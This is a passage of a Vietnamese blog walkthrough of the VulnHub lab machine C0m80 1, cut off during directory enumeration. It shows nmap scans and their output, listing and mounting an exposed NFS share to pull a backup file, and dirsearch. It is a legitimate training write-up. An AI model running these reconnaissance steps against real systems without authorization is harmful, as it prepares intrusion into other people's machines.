<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.png">
  <meta name="google-site-verification" content="Txr_ZAJ6seUhm2Y9s8eRpRy2qOSdUO9A_9jfLLn_bPw">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"guyintheclouds.com","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.23.1","exturl":false,"sidebar":{"position":"right","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"},"path":"/search.json","localsearch":{"enable":true,"top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="OverviewLink download: C0M80: 1Difficulty: [Difficult] but depends on you really (Khó vãi cả đái, thề!)">
<meta property="og:type" content="article">
<meta property="og:title" content="[VulnHub] C0m80 1">
<meta property="og:url" content="https://guyintheclouds.com/2020/12/29/C0m801-vulnhub/index.html">
<meta property="og:site_name" content="Guy_in_the_clouds">
<meta property="og:description" content="OverviewLink download: C0M80: 1Difficulty: [Difficult] but depends on you really (Khó vãi cả đái, thề!)">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://guyintheclouds.com/banner/C0m801-vulnhub.png">
<meta property="og:image" content="https://guyintheclouds.com/2020/12/29/C0m801-vulnhub/pic1.png">
<meta property="og:image" content="https://guyintheclouds.com/2020/12/29/C0m801-vulnhub/pic2.png">
<meta property="og:image" content="https://guyintheclouds.com/2020/12/29/C0m801-vulnhub/pic3.png">
<meta property="og:image" content="https://guyintheclouds.com/2020/12/29/C0m801-vulnhub/pic4.png">
<meta property="og:image" content="https://guyintheclouds.com/2020/12/29/C0m801-vulnhub/pic5.png">
<meta property="og:image" content="https://guyintheclouds.com/2020/12/29/C0m801-vulnhub/pic6.png">
<meta property="article:published_time" content="2020-12-29T02:40:52.000Z">
<meta property="article:modified_time" content="2025-06-14T14:58:22.521Z">
<meta property="article:author" content="minhnq22">
<meta property="article:tag" content="vulnhub">
<meta property="article:tag" content="difficult">
<meta property="article:tag" content="write up">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://guyintheclouds.com/banner/C0m801-vulnhub.png">


<link rel="canonical" href="https://guyintheclouds.com/2020/12/29/C0m801-vulnhub/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://guyintheclouds.com/2020/12/29/C0m801-vulnhub/","path":"2020/12/29/C0m801-vulnhub/","title":"[VulnHub] C0m80 1"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>[VulnHub] C0m80 1 | Guy_in_the_clouds</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous" defer></script>
<script src="/js/third-party/search/local-search.js" defer></script>







  

  <script src="https://cdnjs.cloudflare.com/ajax/libs/firebase/11.1.0/firebase-app-compat.js" integrity="sha256-k2eD8Bl04gp35v4S01cNbO+3UeLK6mVqpOyUJz4aXzY=" crossorigin="anonymous" defer></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/firebase/11.1.0/firebase-firestore-compat.js" integrity="sha256-r1EpenNle+MZs+KB73PFJnrmIF3k29t5XGrSqfZ9PPw=" crossorigin="anonymous" defer></script>
  <script class="next-config" data-name="firestore" type="application/json">{"enable":true,"collection":"articles","apiKey":"AIzaSyDP3hkyO3EkkJ4jY-xQFQ7J2HKYiNu6ay0","projectId":"guyintheclouds-a8920"}</script>
  <script src="/js/third-party/statistics/firestore.js" defer></script>




  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Guy_in_the_clouds</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description"># cat knowledge >> /dev/brain 2> /proc/mind</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="Searching..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Overview"><span class="nav-number">1.</span> <span class="nav-text">Overview</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Information-Gathering"><span class="nav-number">2.</span> <span class="nav-text">Information Gathering</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Nmap"><span class="nav-number">2.1.</span> <span class="nav-text">Nmap</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Dirsearch"><span class="nav-number">2.2.</span> <span class="nav-text">Dirsearch</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Searchsploit"><span class="nav-number">2.3.</span> <span class="nav-text">Searchsploit</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Www-data-shell"><span class="nav-number">2.4.</span> <span class="nav-text">Www-data shell</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Get-Root-shell"><span class="nav-number">3.</span> <span class="nav-text">Get Root shell</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Www-data-shell-1"><span class="nav-number">3.1.</span> <span class="nav-text">Www-data shell</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Metasploit"><span class="nav-number">3.2.</span> <span class="nav-text">Metasploit</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Plink"><span class="nav-number">3.3.</span> <span class="nav-text">Plink</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Bonus"><span class="nav-number">3.4.</span> <span class="nav-text">Bonus</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="minhnq22"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">minhnq22</p>
  <div class="site-description" itemprop="description"><i>Tác giả blog này là một người viển vông và thiếu thực tế, hay còn được gọi là người giời.</i></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">17</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">19</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="mailto:quangminhnguyen2201@gmail.com" title="E-Mail → mailto:quangminhnguyen2201@gmail.com" rel="noopener me" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://github.com/minhnq22" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;minhnq22" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://www.linkedin.com/in/minhnq22" title="Linkedin → https:&#x2F;&#x2F;www.linkedin.com&#x2F;in&#x2F;minhnq22" rel="noopener me" target="_blank"><i class="fab fa-linkedin fa-fw"></i>Linkedin</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://www.topcv.vn/xem-cv/BAYIA1QLUwYHBVFWUFBVAgdUAgcOBwBUDAcCUw7e64" title="CV → https:&#x2F;&#x2F;www.topcv.vn&#x2F;xem-cv&#x2F;BAYIA1QLUwYHBVFWUFBVAgdUAgcOBwBUDAcCUw7e64" rel="noopener me" target="_blank"><i class="fa fa-bed fa-fw"></i>CV</a>
      </span>
  </div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://guyintheclouds.com/2020/12/29/C0m801-vulnhub/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="minhnq22">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Guy_in_the_clouds">
      <meta itemprop="description" content="<i>Tác giả blog này là một người viển vông và thiếu thực tế, hay còn được gọi là người giời.</i>">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="[VulnHub] C0m80 1 | Guy_in_the_clouds">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          [VulnHub] C0m80 1
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2020-12-29 09:40:52" itemprop="dateCreated datePublished" datetime="2020-12-29T09:40:52+07:00">2020-12-29</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/VulnHub/" itemprop="url" rel="index"><span itemprop="name">VulnHub</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="Views">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">Views: </span>
      <span class="firestore-visitors-count"></span>
    </span>
    <span class="post-meta-item" title="Reading time">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">Reading time &asymp;</span>
      <span>28 mins.</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p><img src="/banner/C0m801-vulnhub.png"></p>
<h2 id="Overview"><a href="#Overview" class="headerlink" title="Overview"></a>Overview</h2><p>Link download: <a target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/c0m80-1,198/">C0M80: 1</a><br>Difficulty: <em>[Difficult] but depends on you really</em> (Khó vãi cả đái, thề!)</p>
<span id="more"></span>
<h2 id="Information-Gathering"><a href="#Information-Gathering" class="headerlink" title="Information Gathering"></a>Information Gathering</h2><h3 id="Nmap"><a href="#Nmap" class="headerlink" title="Nmap"></a>Nmap</h3><p>Vẫn là những bước đầu tiên, kiếm xem machine ml này đang có IP là gì.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">$ nmap 10.10.10.0/24                                                                             </span><br><span class="line">Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-29 09:40 +07</span><br><span class="line">Nmap scan report for 10.10.10.1</span><br><span class="line">Host is up (0.00019s latency).</span><br><span class="line">All 1000 scanned ports on 10.10.10.1 are closed</span><br><span class="line"></span><br><span class="line">Nmap scan report for 10.10.10.12</span><br><span class="line">Host is up (0.00025s latency).</span><br><span class="line">Not shown: 995 closed ports</span><br><span class="line">PORT     STATE SERVICE</span><br><span class="line">80/tcp   open  http</span><br><span class="line">111/tcp  open  rpcbind</span><br><span class="line">139/tcp  open  netbios-ssn</span><br><span class="line">445/tcp  open  microsoft-ds</span><br><span class="line">2049/tcp open  nfs</span><br><span class="line"></span><br><span class="line">Nmap done: 256 IP addresses (2 hosts up) scanned in 3.14 seconds</span><br></pre></td></tr></table></figure>
<p>Okay, 10.10.10.12, và tạm thời có mấy cổng với thông tin cơ bản, machine này có thể đang chạy OS là Windows. Tiếp tục tìm kiếm sâu hơn xem sao.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br></pre></td><td class="code"><pre><span class="line">$ nmap -p- 10.10.10.12                                                                           </span><br><span class="line">Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-29 09:41 +07</span><br><span class="line">Nmap scan report for 10.10.10.12</span><br><span class="line">Host is up (0.0031s latency).</span><br><span class="line">Not shown: 65524 closed ports</span><br><span class="line">PORT      STATE SERVICE</span><br><span class="line">80/tcp    open  http</span><br><span class="line">111/tcp   open  rpcbind</span><br><span class="line">139/tcp   open  netbios-ssn</span><br><span class="line">445/tcp   open  microsoft-ds</span><br><span class="line">2049/tcp  open  nfs</span><br><span class="line">20021/tcp open  unknown</span><br><span class="line">41971/tcp open  unknown</span><br><span class="line">44373/tcp open  unknown</span><br><span class="line">44663/tcp open  unknown</span><br><span class="line">57736/tcp open  unknown</span><br><span class="line">59619/tcp open  unknown</span><br><span class="line"></span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 2.67 seconds</span><br><span class="line"></span><br><span class="line">$ nmap -p 80,111,139,445,2049,20021,41971,44663,57736,59619 -sV -sC 10.10.10.12                                                                                           </span><br><span class="line">Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-29 09:43 +07</span><br><span class="line">Nmap scan report for 10.10.10.12</span><br><span class="line">Host is up (0.00057s latency).</span><br><span class="line"></span><br><span class="line">PORT      STATE SERVICE     VERSION</span><br><span class="line">80/tcp    open  http        Microsoft IIS httpd 6.0</span><br><span class="line">|_http-server-header: Microsoft-IIS/6.0</span><br><span class="line">|_http-title: BestestSoftware Ltd.</span><br><span class="line">111/tcp   open  rpcbind     2-4 (RPC #100000)</span><br><span class="line">| rpcinfo: </span><br><span class="line">|   program version    port/proto  service</span><br><span class="line">|   100000  2,3,4        111/tcp   rpcbind</span><br><span class="line">|   100000  2,3,4        111/udp   rpcbind</span><br><span class="line">|   100000  3,4          111/tcp6  rpcbind</span><br><span class="line">|   100000  3,4          111/udp6  rpcbind</span><br><span class="line">|   100003  2,3,4       2049/tcp   nfs</span><br><span class="line">|   100003  2,3,4       2049/tcp6  nfs</span><br><span class="line">|   100003  2,3,4       2049/udp   nfs</span><br><span class="line">|   100003  2,3,4       2049/udp6  nfs</span><br><span class="line">|   100005  1,2,3      36089/udp   mountd</span><br><span class="line">|   100005  1,2,3      43700/tcp6  mountd</span><br><span class="line">|   100005  1,2,3      56182/udp6  mountd</span><br><span class="line">|   100005  1,2,3      59619/tcp   mountd</span><br><span class="line">|   100021  1,3,4      39062/tcp6  nlockmgr</span><br><span class="line">|   100021  1,3,4      39093/udp6  nlockmgr</span><br><span class="line">|   100021  1,3,4      44373/tcp   nlockmgr</span><br><span class="line">|   100021  1,3,4      45251/udp   nlockmgr</span><br><span class="line">|   100024  1          36017/udp   status</span><br><span class="line">|   100024  1          52742/udp6  status</span><br><span class="line">|   100024  1          56325/tcp6  status</span><br><span class="line">|   100024  1          57736/tcp   status</span><br><span class="line">|   100227  2,3         2049/tcp   nfs_acl</span><br><span class="line">|   100227  2,3         2049/tcp6  nfs_acl</span><br><span class="line">|   100227  2,3         2049/udp   nfs_acl</span><br><span class="line">|_  100227  2,3         2049/udp6  nfs_acl</span><br><span class="line">139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)</span><br><span class="line">445/tcp   open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)</span><br><span class="line">2049/tcp  open  nfs_acl     2-3 (RPC #100227)</span><br><span class="line">20021/tcp open  unknown</span><br><span class="line">| fingerprint-strings: </span><br><span class="line">|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, HTTPOptions, RPCCheck, RTSPRequest: </span><br><span class="line">|     220 bestFTPserver 1.0.4 ready...</span><br><span class="line">|     ftp&gt;</span><br><span class="line">|     Unknown ftp command</span><br><span class="line">|     ftp&gt;</span><br><span class="line">|   GetRequest: </span><br><span class="line">|     220 bestFTPserver 1.0.4 ready...</span><br><span class="line">|     ftp&gt;</span><br><span class="line">|     (remote-file) </span><br><span class="line">|     usage: get remote-file [ local-file ]</span><br><span class="line">|     ftp&gt;</span><br><span class="line">|   Help: </span><br><span class="line">|     220 bestFTPserver 1.0.4 ready...</span><br><span class="line">|     ftp&gt;</span><br><span class="line">|     Commands may be abbreviated.</span><br><span class="line">|     Commands are:</span><br><span class="line">|     mdelete qc site</span><br><span class="line">|     disconnect mdir sendport size</span><br><span class="line">|     account exit mget put status</span><br><span class="line">|     append form mkdir pwd struct</span><br><span class="line">|     ascii get mls quit system</span><br><span class="line">|     bell glob mode quote sunique</span><br><span class="line">|     binary hash modtime recv tenex</span><br><span class="line">|     help mput reget tick</span><br><span class="line">|     case idle newer rstatus trace</span><br><span class="line">|     image nmap rhelp type</span><br><span class="line">|     cdup ipany nlist rename user</span><br><span class="line">|     chmod ipv4 ntrans reset umask</span><br><span class="line">|     close ipv6 open restart verbose</span><br><span class="line">|     prompt rmdir ?</span><br><span class="line">|     delete ls passive desert</span><br><span class="line">|     debug macdef proxy send</span><br><span class="line">|     ftp&gt;</span><br><span class="line">|   NULL: </span><br><span class="line">|     220 bestFTPserver 1.0.4 ready...</span><br><span class="line">|_    ftp&gt;</span><br><span class="line">41971/tcp open  mountd      1-3 (RPC #100005)</span><br><span class="line">44663/tcp open  mountd      1-3 (RPC #100005)</span><br><span class="line">57736/tcp open  status      1 (RPC #100024)</span><br><span class="line">59619/tcp open  mountd      1-3 (RPC #100005)</span><br><span class="line">1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :</span><br><span class="line">SF-Port20021-TCP:V=7.91%I=7%D=12/29%Time=5FEA97E1%P=x86_64-pc-linux-gnu...</span><br><span class="line">Service Info: Host: C0M80; OS: Windows; CPE: cpe:/o:microsoft:windows</span><br><span class="line"></span><br><span class="line">Host script results:</span><br><span class="line">|_clock-skew: mean: -1s, deviation: 0s, median: -1s</span><br><span class="line">|_nbstat: NetBIOS name: C0M80, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; (unknown)</span><br><span class="line">| smb-os-discovery: </span><br><span class="line">|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)</span><br><span class="line">|   Computer name: c0m80</span><br><span class="line">|   NetBIOS computer name: C0M80\x00</span><br><span class="line">|   Domain name: \x00</span><br><span class="line">|   FQDN: c0m80</span><br><span class="line">|_  System time: 2020-12-29T02:46:14+00:00</span><br><span class="line">| smb-security-mode: </span><br><span class="line">|   account_used: guest</span><br><span class="line">|   authentication_level: user</span><br><span class="line">|   challenge_response: supported</span><br><span class="line">|_  message_signing: disabled (dangerous, but default)</span><br><span class="line">| smb2-security-mode: </span><br><span class="line">|   2.02: </span><br><span class="line">|_    Message signing enabled but not required</span><br><span class="line">| smb2-time: </span><br><span class="line">|   date: 2020-12-29T02:46:14</span><br><span class="line">|_  start_date: N/A</span><br><span class="line"></span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 158.12 seconds</span><br></pre></td></tr></table></figure>
<p>Sơ qua đây thì có thể thấy machine đang mở cổng đáng chú ý như 80-HTTP, 139 và 445 Samba, 2049-NFS, 20021 có thể là FTP.<br>Tìm hiểu qua về NFS, cái này mới lạ đấy, thề là lần đầu tôi thấy cái này :v</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://en.wikipedia.org/wiki/Network_File_System">https://en.wikipedia.org/wiki/Network_File_System</a><br><em>Network File System (NFS) is a distributed file system protocol originally developed by Sun Microsystems (Sun) in 1984,[1] allowing a user on a client computer to access files over a computer network much like local storage is accessed. NFS, like many other protocols, builds on the Open Network Computing Remote Procedure Call (ONC RPC) system. The NFS is an open standard defined in a Request for Comments (RFC), allowing anyone to implement the protocol.</em></p>
</blockquote>
<p>Giờ thì xem xem thư mục nào trên machine cho phép chia sẻ file.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ showmount --exports 10.10.10.12                                                                </span><br><span class="line">Export list for 10.10.10.12:</span><br><span class="line">/ftpsvr/bkp *</span><br></pre></td></tr></table></figure>
<p>Mount nó vào một thư mục trong máy mình để xem trong đấy có chia sẻ cái gì. Việc này yêu cầu bạn phải có quyền tương đương hoặc lớn hơn với chủ sở hữu (owner) đối với thư mục được mount.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ sudo mount -t nfs 10.10.10.12:/ftpsvr/bkp /tmp/duma</span><br><span class="line"></span><br><span class="line">$ sudo ls -al /tmp/duma                                                                          </span><br><span class="line">total 2736</span><br><span class="line">drwxrwx---  2 root   backup    4096 Sep 23  2017 .</span><br><span class="line">drwxrwxrwt 18 root   root     36864 Dec 31 09:53 ..</span><br><span class="line">-rw-r--r--  1 backup backup 2757002 Dec 31 09:53 ftp104.bkp</span><br></pre></td></tr></table></figure>
<p>Thó được file <em>ftp104.bkp</em>, mở ra thì thấy toàn mã hexdump, kiểm tra các bit signature thì thấy đây có thể là một file thực thi của Windows, nhưng convert sang .exe thì thực thi bị lỗi, vẫn chưa hiểu sao. Dù tôi đã xóa đi những ký tự không phải hexdump như thông tin về ngày tháng ở đầu file, mấy dòng kẻ… Kệ đấy đã, để sau, giờ đi kiếm thông tin tiếp.<br>Vào trong cái website trên cổng 80 nhận được một trang landing, hmm, nothing to do here.<br><img src="/2020/12/29/C0m801-vulnhub/pic1.png"></p>
<h3 id="Dirsearch"><a href="#Dirsearch" class="headerlink" title="Dirsearch"></a>Dirsearch</h3><p>Tìm cái đống tệp tin, thư mục ẩn của nó ra.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">$ ./dirsearch.py -u http://10.10.10.12 -e html,php,txt -x 403</span><br><span class="line">Extensions: html, php, txt | HTTP method: GET | Threads: 30 | Wordlist size: 9791</span><br><span 